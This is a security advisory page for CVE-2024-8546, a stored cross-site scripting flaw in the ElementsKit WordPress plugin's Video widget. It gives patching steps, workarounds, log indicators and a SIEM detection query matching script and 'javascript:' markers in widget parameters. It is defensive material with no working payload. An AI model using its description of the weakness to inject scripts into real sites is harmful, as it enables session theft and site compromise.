CVE-2024-8546
📋 TL;DR
This vulnerability allows authenticated WordPress users with contributor-level access or higher to inject malicious scripts into pages using the ElementsKit Video widget. The scripts are stored and execute whenever users view the compromised pages, enabling cross-site scripting attacks. All WordPress sites using ElementsKit Elementor addons plugin versions up to 3.2.7 are affected.
💻 Affected Systems
- ElementsKit Elementor addons plugin for WordPress
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, redirect users to malicious sites, deface websites, or perform actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Attackers with contributor access inject malicious scripts to steal user session cookies, redirect visitors to phishing sites, or display unwanted content on affected pages.
If Mitigated
With proper user role management and input validation, the impact is limited to content manipulation on specific pages where the vulnerable widget is used.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once attacker has contributor privileges.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.2.8
Vendor Advisory: https://wordpress.org/plugins/elementskit-lite/#developers
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find ElementsKit Elementor addons. 4. Click 'Update Now' if available, or download version 3.2.8+ from WordPress repository. 5. Activate the updated plugin.
🔧 Temporary Workarounds
Disable Video Widget
allTemporarily disable the vulnerable Video widget until patching is complete
Navigate to WordPress admin → ElementsKit → Widgets → Disable 'Video' widget
Restrict User Roles
allLimit contributor-level access to trusted users only
Navigate to WordPress admin → Users → Edit user roles to remove contributor access from untrusted users
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to limit script execution
- Use web application firewall (WAF) rules to block XSS payloads in plugin parameters
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → ElementsKit Elementor addons → Version number. If version is 3.2.7 or lower, you are vulnerable.Check Version:
wp plugin list --name=elementskit-lite --field=versionVerify Fix Applied:
After updating, verify version is 3.2.8 or higher in WordPress plugins page. Test Video widget functionality to ensure it still works properly.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to video widget endpoints
- Multiple failed authentication attempts followed by successful contributor login
- Suspicious script tags in page content containing video widget parameters
Network Indicators:
- Unusual outbound connections from WordPress site after page views
- Requests containing script payloads in video widget parameters
SIEM Query:
source="wordpress" AND (uri_path="/wp-admin/admin-ajax.php" AND parameters CONTAINS "video_widget") AND (parameters CONTAINS "<script>" OR parameters CONTAINS "javascript:")🔗 References
- https://plugins.trac.wordpress.org/browser/elementskit-lite/trunk/widgets/video/parts/video-button.php#L10
- https://plugins.trac.wordpress.org/changeset/3155880/
- https://plugins.trac.wordpress.org/changeset/3155880/elementskit-lite/trunk/widgets/video/video.php
- https://wordpress.org/plugins/elementskit-lite/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve
